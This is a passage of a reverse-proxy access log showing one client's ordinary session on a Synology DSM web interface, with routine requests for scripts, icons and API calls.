Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:29 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 242] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:29 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/SMBService/smb-tab.js?v=4.15.9-0644&SynoToken=rxy.D95tk.Pk." [Client 84.1.26.27] [Length 14997] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:29 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/DSMNotify/DSMNotify.js?v=42962-s9&SynoToken=rxy.D95tk.Pk." [Client 84.1.26.27] [Length 5758] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:29 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi/SYNO.Core.Upgrade" [Client 84.1.26.27] [Length 50] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:29 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/SynologyDrive-ShareSync/app_tray.js?v=3.2.1-23280&SynoToken=rxy.D95tk.Pk." [Client 84.1.26.27] [Length 2818] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:29 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/SynologyDrive/desktop_index_tray.js?v=3.2.1-23280&SynoToken=rxy.D95tk.Pk." [Client 84.1.26.27] [Length 2789] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:29 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/BackgroundTaskMonitor/BackgroundTaskTray.js?v=42962-s9&SynoToken=rxy.D95tk.Pk." [Client 84.1.26.27] [Length 2074] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:29 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/StorageManager/storage_wizard.js?v=42962-s9&SynoToken=rxy.D95tk.Pk." [Client 84.1.26.27] [Length 41851] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:29 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/TinyMCE/TinyMCEVue.js?v=42962-s9&SynoToken=rxy.D95tk.Pk." [Client 84.1.26.27] [Length 5714] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:29 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 186] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:29 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/FileTaskMonitor/MailTaskTray.js?v=1.3.4-1404&SynoToken=rxy.D95tk.Pk." [Client 84.1.26.27] [Length 1789] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:29 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi/SYNO.Core.DisableAdmin" [Client 84.1.26.27] [Length 80] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:29 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/CloudSync/dscs_package.js?v=2.7.2-2464&SynoToken=rxy.D95tk.Pk." [Client 84.1.26.27] [Length 69138] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:29 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/SynologyDrive-ShareSync/images/1x/tbar_menu_icn_pause.png" [Client 84.1.26.27] [Length 173] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/3rdparty/SynologyDrive-ShareSync/style.css?v=1731304858" +[30/Jan/2026:13:44:29 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/ext-3/ux/images/1x/menu_arrow_r.png?v=8fbae554c9026f62d469474ba885fab0" [Client 84.1.26.27] [Length 420] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/scripts/ext-3/ux/ux-all.css?v=1650348555" +[30/Jan/2026:13:44:29 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/SynologyDrive-ShareSync/images/1x/tbar_menu_icn_folder.png" [Client 84.1.26.27] [Length 216] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/3rdparty/SynologyDrive-ShareSync/style.css?v=1731304858" +[30/Jan/2026:13:44:29 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:29 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/DSMNotify/images/1x/tbar_bt_setting.png?v=64a2b619c83e2d218cfc213dfca3d082" [Client 84.1.26.27] [Length 1543] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/modules/DSMNotify/style.css?v=1661757678" +[30/Jan/2026:13:44:29 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 65] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:29 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/SynologyDrive-ShareSync/images/1x/tbar_menu_icn_launch.png" [Client 84.1.26.27] [Length 586] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/3rdparty/SynologyDrive-ShareSync/style.css?v=1731304858" +[30/Jan/2026:13:44:29 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/SynologyDrive-ShareSync/images/1x/tbar_menu_icn_recent.png" [Client 84.1.26.27] [Length 543] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/3rdparty/SynologyDrive-ShareSync/style.css?v=1731304858" +[30/Jan/2026:13:44:29 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/SynologyDrive/images/tray_icon/1x/icn_thumbnail_converter.png" [Client 84.1.26.27] [Length 476] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/3rdparty/SynologyDrive/style.css?v=1731304862" +[30/Jan/2026:13:44:29 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/FileTaskMonitor/UploadMonitor.js?v=1.3.4-1404&SynoToken=rxy.D95tk.Pk." [Client 84.1.26.27] [Length 6258] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:29 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/SynologyDrive/images/tray_icon/1x/overview_status_drive_index.png" [Client 84.1.26.27] [Length 5198] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/3rdparty/SynologyDrive/style.css?v=1731304862" +[30/Jan/2026:13:44:29 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/ext-3/ux/images/1x/combo_trigger.png?v=8710c149eda822e2cea65d04294fe3b4" [Client 84.1.26.27] [Length 446] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/scripts/ext-3/ux/ux-all.css?v=1650348555" +[30/Jan/2026:13:44:29 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/CloudSync/images/1x/cloudsync_menu_pause.png?v=1c5da687c4ba047de83d53cf0c9b8faf" [Client 84.1.26.27] [Length 173] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/3rdparty/CloudSync/style.css?v=1744186293" +[30/Jan/2026:13:44:30 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/CloudSync/images/1x/cloudsync_menu_launch.png?v=35914986444b1f36b0d98a60cf9d1b7f" [Client 84.1.26.27] [Length 539] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/3rdparty/CloudSync/style.css?v=1744186293" +[30/Jan/2026:13:44:30 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/CloudSync/images/1x/cloudsync_menu_recent.png?v=0072a433b9598a0df7d69693eda96c65" [Client 84.1.26.27] [Length 543] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/3rdparty/CloudSync/style.css?v=1744186293" +[30/Jan/2026:13:44:30 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:30 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/AdminCenter/admin_center.js?v=42962-s9&SynoToken=rxy.D95tk.Pk." [Client 84.1.26.27] [Length 423009] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:30 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/HybridShare/C2FS.js?v=1.3.2-1037&SynoToken=rxy.D95tk.Pk." [Client 84.1.26.27] [Length 164398] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:30 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 3566] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:30 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 426] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:30 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 409] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:30 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 353] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:30 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/CloudSync/images/1x/wdgt_icn_tray_cloud_sync_done.png?v=45d0095da5a965199220e140d577ef68" [Client 84.1.26.27] [Length 2699] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/3rdparty/CloudSync/style.css?v=1744186293" +[30/Jan/2026:13:44:30 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/CloudSync/images/1x/cate_status.png?v=bb521cb3ed4dfaadf7f091d461a6ea00" [Client 84.1.26.27] [Length 2471] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/3rdparty/CloudSync/style.css?v=1744186293" +[30/Jan/2026:13:44:31 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 28340] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:31 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 180] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:31 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 52] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:32 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 194] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:32 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 190] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:33 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi/SYNO.Foto.UserInfo" [Client 84.1.26.27] [Length 276] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:33 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 106] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:34 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 4325] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:37 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/DSMNotify/images/1x/tbar_icn_status.png?v=383dac1d9a4ac4963c23b6584830ac71" [Client 84.1.26.27] [Length 1039] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/modules/DSMNotify/style.css?v=1661757678" +[30/Jan/2026:13:44:37 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/DSMNotify/images/1x/tbar_bt_expand.png?v=eff629ec6029324c65db11201908a4f5" [Client 84.1.26.27] [Length 786] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/modules/DSMNotify/style.css?v=1661757678" +[30/Jan/2026:13:44:39 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:39 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/ClipBoardJS/clipboard.js?v=42962-s9&SynoToken=rxy.D95tk.Pk." [Client 84.1.26.27] [Length 2929] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:39 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/FileBrowser/FileSaver.min.js?v=42962-s9&SynoToken=rxy.D95tk.Pk." [Client 84.1.26.27] [Length 1261] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:39 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/TinyMCE/TinyMCE.js?v=42962-s9&SynoToken=rxy.D95tk.Pk." [Client 84.1.26.27] [Length 874] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:39 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/FileBrowser/FileUploader.js?v=1.3.4-1404&SynoToken=rxy.D95tk.Pk." [Client 84.1.26.27] [Length 10806] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:39 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/FileBrowser/FileTask.js?v=1.3.4-1404&SynoToken=rxy.D95tk.Pk." [Client 84.1.26.27] [Length 441] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:39 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/Utils/QRCodeDialog.js?v=42962-s9&SynoToken=rxy.D95tk.Pk." [Client 84.1.26.27] [Length 631] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:39 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/ClipBoardJS/syno_clipboard.js?v=42962-s9&SynoToken=rxy.D95tk.Pk." [Client 84.1.26.27] [Length 1517] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:39 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/FileBrowser/jszip.min.js?v=42962-s9&SynoToken=rxy.D95tk.Pk." [Client 84.1.26.27] [Length 26662] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:39 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 23510] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:39 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/FileBrowser/FileProperty.js?v=42962-s9&SynoToken=rxy.D95tk.Pk." [Client 84.1.26.27] [Length 8276] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:39 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/SharingManager/SharingManager.js?v=42962-s9&SynoToken=rxy.D95tk.Pk." [Client 84.1.26.27] [Length 6253] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:40 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/FileBrowser/FileBrowser.js?v=1.3.4-1404&SynoToken=rxy.D95tk.Pk." [Client 84.1.26.27] [Length 131703] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:40 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 4324] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:40 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 471] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:40 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Synohdpack&version=1&method=getHDIcon&res=24&retina=false&path=webman/3rdparty/FileBrowser/images/icon/FileStation_{0}.png&app_version=1.3.4-1404" [Client 84.1.26.27] [Length 1983] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:40 +0000] - 200 200 - GET https nas.profibot.hu "/webman/taskbar/dist/assets/637c3c82fdfed829fdbbe8cfe5b78b24.gif" [Client 84.1.26.27] [Length 2432] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/taskbar/dist/style.css?v=1661421011" +[30/Jan/2026:13:44:40 +0000] - 200 200 - GET https nas.profibot.hu "/synoSDSjslib/images/1x/wdheader_bt_minimize.png?v=3904c68eb6bbf1b48049a98e7e439735" [Client 84.1.26.27] [Length 342] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/synoSDSjslib/sds.css?v=1654081517" +[30/Jan/2026:13:44:40 +0000] - 200 200 - GET https nas.profibot.hu "/synoSDSjslib/images/1x/wdheader_bt_help.png?v=5e82ac965a2fb41f0af06a5638c1bf48" [Client 84.1.26.27] [Length 1110] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/synoSDSjslib/sds.css?v=1654081517" +[30/Jan/2026:13:44:41 +0000] - 200 200 - GET https nas.profibot.hu "/synoSDSjslib/images/1x/wdheader_bt_restore.png?v=d8b258b1d95b0775869166bf9c929920" [Client 84.1.26.27] [Length 670] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/synoSDSjslib/sds.css?v=1654081517" +[30/Jan/2026:13:44:41 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 158] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:41 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 29933] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[30/Jan/2026:13:44:41 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] 